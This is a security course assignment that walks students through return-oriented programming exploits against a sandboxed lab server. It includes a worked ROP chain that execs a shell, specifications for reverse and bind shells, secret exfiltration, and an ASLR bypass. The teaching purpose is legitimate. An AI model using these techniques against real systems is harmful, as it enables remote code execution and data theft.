Project 2: Return-oriented Programming
Due: 2026-03-29 23:59
Goal
The goal of this project is to practice writing return-oriented programs and implement several different types of shellcode.
Specifically, there is one target binary which is an x86-64 Linux server program. The target server creates a socket and listens for incoming TCP connections. It engages in a very simple, text-based protocol in which the client sends one of 3 commands and the server sends a response. More details on this protocol are given below.
You will write five different Python programs which will exploit the server in different ways. The target server will run in the same sandbox VM that you used for project 1. Your exploit programs will run outside of the VM and will connect to the server in the VM.
Skeleton code for each Python program has been provided showing the arguments, but each will need substantial modification.
Collaboration
You may work on this project in collaboration with one or two partners as described on the main page.
You must not discuss the project with anyone other than your partners and course staff. You may use online resources for general reference, but not to search for solutions to specific questions posed in this project.
Preliminaries
Go to the GitHub Classroom page and accept the assignment.
- If you are working by yourself, create a new team (you can name it whatever you like).
- If you are working with a partner (which I recommend), one of you should create a new team and the other should join the team.
Warning: Do not join any team other than your partners’. There’s no way to change teams for the assignment so just don’t do it! (If you do join the wrong team by mistake, let me know immediately.)
Virtual Machine modifications
Since this project requires you to make network connections to the VM, you’re going to need to start by modifying the start.sh (or start.ps1) script that runs the VM to forward ports from your local computer to the VM.
Specifically, modify the line that starts -netdev to the following
-netdev user,id=net0,hostfwd=tcp:127.0.0.1:2200-:22,hostfwd=tcp:127.0.0.1:21234-:21234,hostfwd=tcp:127.0.0.1:21235-:21235
Make sure you include the line continuation character at the end of the line (backslash for start.sh and a backtick for start.ps1). This instructs QEMU to
- forward port 2200 on your host machine to port 22 on the VM (this is the same as project 1 and is the
ssh port); and - forward ports 21234 and 21235 from your host machine to the same ports in the VM.
You will run the target server on port 21234 and port 21235 will be used in one of the exploits.
The Target
The target binary has been compiled from target.c and uses the with PCRE2 library (source not provided). You must not change target or attempt to recompile it from target.c. If you do so, your exploits will almost certainly not work against the unmodified target.
The target is a simple server program that listens on the specified port for a connection. Once connected, a client can send one of three commands:
PUT SECRET <password> <secret>\r\n
stores the provided password (which may not contain whitespace) and secret in memory.
GET SECRET <password>\r\n
responds with the secret, so long as the provided password matches the password provided in the previous PUT SECRET command.
responds with whatever text you sent it.
See target.c for the precise details.
The Assignment
There are five required tasks and one optional task. Each required task involves modifying a Python exploit program to construct a return-oriented exploit to exploit target in the manner specified.
Unlike Project 1, code injection will not be possible due to standard DEP protections. Instead, you will need to implement return-oriented programs. This will be tricky, but it is how modern software exploitation actually works.
The assignment repository contains two files target-gadgets.txt and libc-gadgets.txt that were produced by running Jonathan Salwan’s ROPgadget tool on target and on the libc that is loaded into the process and filtered to only contain the gadgets that end in ret.
You’re free to use gadgets from either although you’ll definitely need to use at least the syscall ; ret gadget from libc.
Each gadget appears on a line by itself. For example
0x0000000000001546 : pop rdi ; ret
is a gadget that can be used to load a value from the stack into register rdi. The leading number is the offset of these instructions from the start of where the target (or libc) binary is loaded into memory. To find target’s base address (and libc’s base address), you can run ./target 21234 in one shell, get the PID of the target, and then look at /proc/<pid>/maps in another shell to find the base address of target.
Each task description below contains an example which consists of running ./target 21234 in the VM and running the Python program for the task. In addition, each task description includes the partial output of running the target using strace(1). Your code should induce the same behavior in target. That is, replacing ./target 21234 with strace -o trace ./target 21234 and following the provided example should produce the same system calls, with the same arguments, in the same order as shown. (File descriptor numbers may be different from those shown, but should be self-consistent.)
You may not use any of the system calls that allocate writable and executable memory nor any system calls that change memory page permissions. In particular, all of the exploits you write must be entirely in the return-oriented style; you should not inject any x86-64 code.
When exploiting the target, you should not assume anything about stack addresses (in particular, you should not assume anything about environment variables) or file descriptor/socket numbers. In particular, I’m going to test your exploits by using random stack addresses (by setting environment variables) and with different numbers of open file descriptors.
For each of the tasks, write a few sentences in writeup.md that explains how the exploit works. If there are any tricky gadgets you used, explain what you had to do to make them work.
For the required tasks, address space layout randomization is turned off. I’ve provided a script in the assignment repository, aslr.sh which can turn ASLR on or off. The VM has been configured to disable ASLR on startup and the aslr.sh script does not make the changes permanent so if you restart the VM while working on the optional task, you’ll need to reenable ASLR.
Hints for all tasks
- To disassemble
target, use objdump -d -Mintel target. - strace(1) is an invaluable tool. Use it to run
target to see what system call arguments you’re passing. - Multiple calls to send(2) can be received by a single call to recv(2). If that’s not what you want, put a small delay between send calls.
- Don’t hardcode the addresses of gadgets. Instead, create variables
target_base, and libc_base (or similar) and add offsets to the gadgets to those. E.g., pop_rax = target_base + 0x1234. This will make doing the extra credit task much easier. - Start early!
The Tasks
Task 1 Local shell (local.py)
The first task is to exploit target and have it exec a shell.
Specifically, you’re going to want to remove most of the code in local.py and instead, construct a payload to send to the server by making socket calls. (See the Python socket library documentation for information on the various functions you can call on sockets.)
The payload you send to target is going to contain a return-oriented program that will make the system call execve("/bin/sh", NULL, NULL).
The easiest way to construct the ROP program in Python is to use struct.pack function. You’re going to be using this function extensively so it makes sense to import it directly.
The execve system call requires a pointer to the program to exec in register rdi. To accomplish this, we can write /bin/sh (followed by a 0 byte) somewhere in memory and then put a pointer to it in rdi. We’ll also need to put 0 in registers rsi and rdx and then put the system call number for execve in rax and make a syscall. Looking through the list of gadgets available, I see several gadgets that look useful for this purpose:
pop rax ; ret
pop rdx ; ret
pop rdi ; ret
pop rsi ; ret
mov qword ptr [rdx], rax ; ret
syscall ; ret
You may use others if you desire; all that matters is rax, rdi, rsi, and rdx have the correct values when the syscall instruction runs.
Let’s look at how we can construct such a return-oriented program.
from struct import pack
rop = bytearray()
# Write /bin/sh to the start of `target`'s data.
rop += pack('<QQ', pop_rdx, target_data)
rop += pack('<Q', pop_rax) + b'/bin/sh\x00'
rop += pack('<Q', store_rdx_rax)
# execve("/bin/sh", NULL, NULL)
rop += pack('<QQ', pop_rdi, target_data)
rop += pack('<QQ', pop_rsi, 0)
rop += pack('<QQ', pop_rdx, 0)
rop += pack('<QQ', pop_rax, 59)
rop += pack('<Q', syscall)
Not shown in the above code, I created variables corresponding to the addresses (not offsets!) of each of the gadgets. The code is using these variables with pack() to construct the return-oriented program.
Let’s take a look at the first few “instructions” in the program.
# Write /bin/sh to the start of `target`'s data.
rop += pack('<QQ', pop_rdx, target_data)
rop += pack('<Q', pop_rax) + b'/bin/sh\x00'
rop += pack('<Q', store_rdx_rax)
When rop is written to the stack, starting at the saved return address, it looks like this (the blank stack slots with an arrow to the right indicate that the stack slot is filled with the address of the gadget indicated).
│ │→ mov [rdx], rax ; ret
│ "/bin/sh\0" │
│ │→ pop rax ; ret
│ target_data │
rsp → │ │→ pop rdx ; ret
When the function returns, it will return to the pop rdx which will pop target_data off the stack into rdx. This should be the address of some writable data within the target’s memory. The subsequent ret will return to the pop rax instruction which will pop the 8 bytes corresponding to /bin/sh\0 into rax. The subsequent ret will return to mov [rdx], rax which will store the value in rax at the address pointed to by rdx.
The remaining ROP instructions,
# execve("/bin/sh", NULL, NULL)
rop += pack('<QQ', pop_rdi, target_data)
rop += pack('<QQ', pop_rsi, 0)
rop += pack('<QQ', pop_rdx, 0)
rop += pack('<QQ', pop_rax, 59)
rop += pack('<Q', syscall)
will pop target_data into rdi, 0 into rsi and rdx, 59—the system call number for execve—into rax, and finally return to the syscall instruction.
Notice that each 8-byte word in the rop bytearray is either the address of code to return to or some data that will be popped off the stack by the code.
To complete this task, modify local.py to:
- Exploit
target and make it exec /bin/sh by overwriting the saved return address and the subsequent words on the stack with this return-oriented program. (Disassembling target using objdump -d -Mintel target can help you figure out where the saved return address is is relative to the start of the array, or you can use gdb)
To test that everything works, run ./target 21234 in the VM and on your host machine, run ./local.py 21234. You should see something like the following in the VM’s shell.
user@sandbox:~/project-2$ ./target 21234
$
Running strace -o trace ./target 21234 and then running ./local.py 21234, writes the following (in part) to the file trace.
...
sendto(4, "INVALID COMMAND\r\n", 17, 0, NULL, 0) = 17
execve("/bin/sh", NULL, NULL) = 0
...
Hint: You’re going to want to remove essentially all of the skeleton code that is in local.py (and similarly for the other files). It just exists to show you how to use the socket api. In particular, you’re not going to want the send_cmd function, however, the loop for printing results may be useful in secret.py.
Task 2 Dup shell (dup.py)
The first exploit was fun to do (I hope), but not terribly useful. After all, it opened a shell on the remote machine with no way to communicate with it! You’re going to fix that right now.
You need to connect target’s stdin, stdout, and stderr to the socket before you exec /bin/sh. Fortunately, that’s easy to do with the dup2(2) system call.
To make a system call, you need to know what to put in each register. Fortunately, Filippo Valsorda’s Searchable Linux Syscall Table is a great resource . Search for dup2 and then double click on the row of the table to see what goes in each register.
One potentially tricky aspect is you need to put the socket file descriptor in register rdi, but you can’t know what value to use until the exploit connects. Looking at the disassembly for target, you’ll see that the return value from accept(2) (which is in eax) is stored in ebx in main before being put in edi as the argument to handle_connection(). Note that since file descriptors (and thus sockets) are ints, they’re 4 bytes so the compiler is using registers eax, ebx, and edi, rather than the full 64-bit registers rax, rbx, and rdi. This will be useful to you later on.
At the start of handle_connection, the socket is going to be in all three of those registers and its value gets saved in ebp. Unfortunately, rbx and rbp will be restored from the stack prior to the ret and our exploit will have overwritten those values. All hope is not lost, run target in gdb and break near the end of handle_connection. Luckily, the socket file descriptor is available! (Hint: Look at the values in the registers using (gdb) info reg.)
In essence, you want to get the socket file descriptor that was returned from accept(2) in target—call it sock—and make the three system calls that correspond to
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
and then exec /bin/sh as you did in local.py.
To complete this task, modify dup.py to:
- Exploit
target and have it perform the dup2(2) system calls and exec the shell as described above; - Read from
stdin and write to the socket and read from the socket and write to stdout. You may find the console function in console.py useful for this task. Simply import the function using from console import console, pass the socket to console, and it should take care of everything. The prompt will not appear, but you can still enter commands and see the result.
To test that everything works, run ./target 21234 in the VM. On your computer, run
$ ./dup.py 21234.
INVALID COMMAND
date
Thu Feb 26 15:14:26 EST 2026
exit
Running strace -o trace ./target 21234, with the example above writes the following (in part) to trace.
...
sendto(4, "INVALID COMMAND\r\n", 17, 0, NULL, 0) = 17
dup2(4, 0) = 0
dup2(4, 1) = 1
dup2(4, 2) = 2
execve("/bin/sh", NULL, NULL) = 0
...
read(0, "date\n", 8192) = 5
...
read(0, "exit\n", 8192) = 5
...
Task 3 Reverse shell (reverse.py)
The exploit used in dup.py connected the shell to the socket we used to connect to target initially. For this task, the exploit will cause target to make a connection to a remote server, connect the resultant socket to stdin/stdout/stderr (as was done in dup.py), and exec a shell.
Creating a new socket and making a connection involves making several system calls.
There are several ways to call these functions. Since they appear in target, it’s possible to return to them with correct arguments in registers. However, the first argument to connect(2) is the return value from the socket(2) which makes making returning to the libc implementations more difficult than just making system calls directly, just like you did with dup2.
See the associated manual pages for example usage and see the hints below for suggestions on making these system calls. And see the example below for the arguments to the system calls.
As described below, reverse.py will create a listening socket that your exploit will connect to. Programs running inside the QEMU virtual machine can connect to the host computer using IP address 10.0.2.2. The port number used should be specified as an argument to reverse.py (see the example below).
To complete this task, modify reverse.py to:
- Open a socket to listen on the port specified as a command line parameter to
reverse.py (see example below). - Exploit
target and have it make a new connection to 10.0.2.2 with the same port used in step 1. Once connected, target should exec a shell with stdin/stdout/stderr connected to the new socket. - Read from
stdin and write to the newly opened socket and read from the socket and write to stdout. Again, the console function may be helpful.
To test that everything works, run ./target 21234 in the VM. On your computer, run
$ ./reverse.py 21234 12345.
date
Thu Feb 26 15:27:18 EST 2026
exit
Running strace -o trace ./target 21234, with the example above writes the following (in part) to the trace file.
...
sendto(4, "INVALID COMMAND\r\n", 17, 0, NULL, 0) = 17
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 5
connect(5, {sa_family=AF_INET, sin_port=htons(12345), sin_addr=inet_addr("10.0.2.2")}, 16) = 0
dup2(5, 0) = 0
dup2(5, 1) = 1
dup2(5, 2) = 2
execve("/bin/sh", NULL, NULL) = 0
...
read(0, "date\n", 8192) = 5
...
read(0, "exit\n", 8192) = 5
...
Hints: When you create a new socket using the socket system call, the value of that socket will be returned in eax (the value 5 in the example above). This value is needed as an argument to connect as well as dup2. You cannot rely on it having a fixed value. Instead, you should write the value of rax somewhere in memory (just as you do for /bin/sh) and then load it back into the appropriate register. Specifically, you’ll need it in rdi, or really, since it’s a 32-bit value, putting it in edi is sufficient.
There are multiple gadgets that can do this but nothing as easy as mov qword ptr rdi, [reg] ; ret or mov dword ptr edi, [reg] ; ret. One way to do this is to use a more complicated gadget that can load a value from memory into rdi or edi but that also does other things before returning. Make sure those other things do not modify the values of registers you care about. A second way is to use an arithmetic or logical instruction to load the value into the register. For example, you can set rdi/edi to 0 and then add or or a value from memory into rdi/edi. Similarly, you can set rdi/edi to -1 and and a value from memory into it. (I’m not claiming that all of these gadgets exist, merely that at least one gadget of this form does exist.)
The connect system call requires a pointer to a struct sockaddr. This is a bit of a historical oddity. A struct sockaddr doesn’t actually contain enough information to make a connection. It’s a generic structure that contains a 2-byte field named sa_family that defines what type of structure it actually is followed by an array of some size called sa_data. In this case, you want to use a struct sockaddr_in (which is also described in that man page) which specifies an IPv4 address and port. The layout of a struct sockaddr_in is as follows.
bytes field description endian
------------------------------------------------------------
00-01 sin_family this is AF_INET (value 2) native endian
02-03 sin_port the port number network endian
04-07 sin_addr the IPv4 address network endian
08-0F unused by sockaddr_in
Notice that this structure has one field, sin_family as a host native endian value (i.e., little endian for x86-64) and the sin_port and sin_addr fields are in network endian (i.e., big endian)! You can use pack('>HL', port, addr) to write in big endian. To convert an IPv4 address like 1.2.3.4 to a 32-bit integer, just convert each of the 4 fields to hex individually and put them together. So for example, 1.2.3.4 becomes 0x01020304 and 127.0.0.1 becomes 0x7F000001.
Task 4 Bind shell (bind.py)
The exploit used in dup.py connected the shell to the socket we used to connect to target initially; the exploit used in reverse.py made a connection back to the attacker. For this task, the exploit will cause target to start listening on a specified port and, when a new connection occurs, connect stdin/stdout/stderr to the newly connected socket and exec a shell. This is called a bind shell.
Listening on a port and accepting new connections involves making several system calls.
As was the case for reverse.py, there are several ways to call these functions. As before, it’s easiest to just make the system calls directly.
See target.c and the associated manual pages for example usage and see the hints below for suggestions on making these system calls. And see the example below for the arguments to the system calls.
Note that like connect, bind also requires passing a pointer to a struct sockaddr_in. In this case, you can use the address 0.0.0.0 to mean accept connections from any address.
To complete this task, modify bind.py to:
- Exploit
target and have it listen for a new connection on a different port (specified as a command line parameter to bind.py—see example below). Once a connection happens, target should exec a shell with stdin/stdout/stderr connected to the socket. - Make a new connection to
127.0.0.1:<listen_port> where <listen_port> is the port specified as the second command line parameter (see example). - Read from
stdin and write to the newly opened socket and read from the socket and write to stdout. Again, the console function may be helpful.
The modifications to the start.sh script described above forward port 21235 from the host to the VM. So that’s the port you’re going to want to listen on.
To test that everything works, run ./target 21234 in the VM. On your computer, run
$ ./bind.py 21234 21235.
date
Thu Feb 26 16:10:03 EST 2026
exit
Running strace -o trace ./target 21234, with the example above writes the following (in part) to the trace file.
...
sendto(4, "INVALID COMMAND\r\n", 17, 0, NULL, 0) = 17
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 5
bind(5, {sa_family=AF_INET, sin_port=htons(21235), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(5, 1) = 0
accept(5, NULL, NULL) = 6
dup2(6, 0) = 0
dup2(6, 1) = 1
dup2(6, 2) = 2
execve("/bin/sh", NULL, NULL) = 0
...
read(0, "date\n", 8192) = 5
...
read(0, "exit\n", 8192) = 5
...
Task 5 Data exfiltration (secret.py)
The final task is to convince target to write its secret to the socket without knowing the password. No need to get a shell this time.
It’s possible to write to a socket using send(2) or write(2). The send system call is slightly more complicated to use than write, so use write instead.
You will need to know how much data to write. This value is not stored anywhere in memory directly. Instead, you’ll want to call strlen() on the secret value. (You could instead implement strlen() in a return-oriented fashion but loops are significantly more complicated to write than making function calls and we don’t have many convenient gadgets for conditionally changing the stack pointer, so let’s not do that here.)
Somewhat annoyingly, the strlen symbol in glibc is not actually the strlen function. Specifically, if we try to return to strlen function (which lives at offset 0x9f1b0 in glibc), the return value in rax is not the length of the string pointed to by rdi. If we use readelf --syms on glibc and compare strlen to a normal function like fread, we can see what is going on.
$ readelf --syms /lib/x86_64-linux-gnu/libc.so.6|egrep 'strlen|fread'
507: 00000000000766a0 242 FUNC WEAK DEFAULT 16 fread@@GLIBC_2.2.5
1122: 000000000009f1b0 129 IFUNC GLOBAL DEFAULT 16 strlen@@GLIBC_2.2.5
From this output, we can see that strlen is not a FUNC, it’s an IFUNC. An IFUNC is an indirect function. It’s a way for glibc to provide multiple, optimized implementations of functions. The function that gets called at run time depends on the capabilities of the computer. Specifically, the value that gets returned by the strlen indirect function is the address of the machine-specific strlen function. So what does that mean for this exploit? Well, you have at least 3 options for calling strlen.
target itself calls strlen through its PLT; you can do that as well;- You can get the address of the real
strlen function that glibc will use, e.g., by using gdb; or - You can return to the strlen resolver function at
libc_base + 0x9f1b0 and then use a push rax ; ret gadget immediately afterward to return to the actual function. Any of these approaches should work.
To complete this task, modify secret.py to:
- Exploit
target and have it write the secret value to the socket by making a write(2) system call. Afterward, exit cleanly by making an exit system call with return value 0. (See the hints below for suggestions on making multiple system calls.) - Read the secret from the socket and print it out. (The secret won’t have a newline, so you’ll probably want to add that yourself.)
Your secret.py should assume that a secret has already been set.
To test that everything works, run ./target 21234 in the VM. On your computer, run
$ echo 'PUT SECRET password1 This is super secret!' | nc -C 127.0.0.1 21234
SECRET STORED
$ ./secret.py 21234.
INVALID COMMAND
This is super secret!
Running strace -o trace ./target 21234, with the example above writes the following (in part) to the trace file.
...
accept(3, NULL, NULL) = 4
recvfrom(4, "PUT SECRET password1 This is sup"..., 1024, 0, NULL, NULL) = 43
recvfrom(4, "", 1067, 0, NULL, NULL) = 0
sendto(4, "SECRET STORED\r\n", 15, 0, NULL, 0) = 15
close(4) = 0
accept(3, NULL, NULL) = 4
...
sendto(4, "INVALID COMMAND\r\n", 17, 0, NULL, 0) = 17
write(4, "This is super secret!", 21) = 21
exit(0) = ?
Hint: Moving data between registers is surprisingly tricky. In particular, getting a 64-bit, nonconstant value into rdi was quite difficult. For 32-bit values, you wrote the value to memory and then read it back into edi. That won’t work here since we need an address in rdi. If you search the gadgets files for gadgets that use rdi as a destination register, you won’t find many of them. I think there are a few ways to do it (possibly using sub rdi, ... and some arithmetic, but I didn’t attempt this). I think the easiest way is to use a somewhat surprising gadget, mov rdi, rdx ; jmp rax. Note that this ends in a jmp to rax rather than a ret. So how do we make this work? Well, if we first put the address of a ret in rax and then return to the mov rdi, rdx ; jmp rax gadget, it will move rdx into rdi and then jump to a ret which will allow us to continue with our return-oriented program.
This task is optional. If you’ve completed tasks 1–5, then you’re done and you don’t need to do this. If you want a little extra challenge, this task is for you.
In this task, you’re going to modify all 5 of your required exploits to work when address space layout randomization (ASLR) is turned on. If you have followed the hint above about using target_base and libc_base variables, then the only new thing you’ll need to do is learn (at runtime!) where the target and libc are loaded in memory and set those two variables appropriately. Everything else should work.
I’ve provided an aslr.sh script which can enable ASLR. You’ll want to turn it on
(and enter user as the password when it asks).
To complete this task:
- Modify each of your exploits to learn the base address of
target and libc and use those addresses to construct your return-oriented program.
Hints: I solved this by creating a addr.py file that contains two functions target_base(port) and libc_base(port). Each will connect to the target and exploit a bug to leak an address in target or libc, respectively. From this leaked address, the function constructs the base address via simple arithmetic and returns it. Each of my 5 exploit programs import addr and then call the appropriate functions to set the target_base and libc_base variables.
When a program starts, the first function that runs is not main. Instead, the program starts running at _start. From disassembling target, you can see that _start calls __libc_start_main and passes it the address of main as an argument. After initializing libc’s data, __libc_start_main will call main. You can make use of this fact to learn the offset of an instruction in target and an instruction in libc.
Deliverables
- The five exploit programs,
local.py, dup.py, reverse.py, bind.py, and secret.py plus any additional python files you created that are required to run those. writeup.md containing descriptions of your exploits. If you did the optional task, writeup.md should explain how you learned the base addresses of target and libc.